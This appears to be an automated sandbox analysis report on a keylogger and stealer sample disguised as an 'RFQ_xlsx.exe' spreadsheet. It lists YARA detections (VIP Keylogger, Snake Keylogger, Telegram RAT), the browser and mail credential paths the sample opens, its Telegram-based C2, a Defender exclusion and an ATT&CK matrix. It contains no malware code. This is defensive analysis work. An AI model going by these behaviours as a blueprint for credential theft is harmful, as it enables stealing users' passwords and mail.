                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7180, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3650522497.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3654868131.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3653904508.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7180, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7180, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		23
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		3
                Obfuscated Files or Information                		Security Account Manager111
                Security Software Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object Model1
                Email Collection                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSH1
                Input Capture                		14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637262 Sample: 2025 5595  TEKL#U0130F #U01... Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 47 reallyfreegeoip.org 2->47 49 api.telegram.org 2->49 51 2 other IPs or domains 2->51 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 77 16 other signatures 2->77 8 2025 5595  TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe 6 2->8         started        12 gNFUFfdz.exe 2->12         started        14 svchost.exe 2->14         started        signatures3 73 Tries to detect the country of the analysis system (by using the IP) 47->73 75 Uses the Telegram API (likely for C&C communication) 49->75 process4 dnsIp5 41 C:\Users\user\AppData\Roaming\gNFUFfdz.exe, PE32 8->41 dropped 43 C:\Users\...\gNFUFfdz.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmpC2F0.tmp, XML 8->45 dropped 79 Adds a directory exclusion to Windows Defender 8->79 81 Injects a PE file into a foreign processes 8->81 17 powershell.exe 23 8->17         started        20 2025 5595  TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe 15 2 8->20         started        23 powershell.exe 23 8->23         started        25 schtasks.exe 1 8->25         started        83 Multi AV Scanner detection for dropped file 12->83 27 gNFUFfdz.exe 12->27         started        29 schtasks.exe 12->29         started        59 127.0.0.1 unknown unknown 14->59 file6 signatures7 process8 dnsIp9 61 Loading BitLocker PowerShell Module 17->61 31 conhost.exe 17->31         started        33 WmiPrvSE.exe 17->33         started        53 api.telegram.org 149.154.167.220, 443, 49752, 49755 TELEGRAMRU United Kingdom 20->53 55 checkip.dyndns.com 193.122.130.0, 49710, 49716, 49719 ORACLE-BMC-31898US United States 20->55 57 reallyfreegeoip.org 104.21.96.1, 443, 49713, 49715 CLOUDFLARENETUS United States 20->57 35 conhost.exe 23->35         started        37 conhost.exe 25->37         started        63 Tries to steal Mail credentials (via file / registry access) 27->63 65 Tries to harvest and steal browser information (history, passwords, etc) 27->65 39 conhost.exe 29->39         started        signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.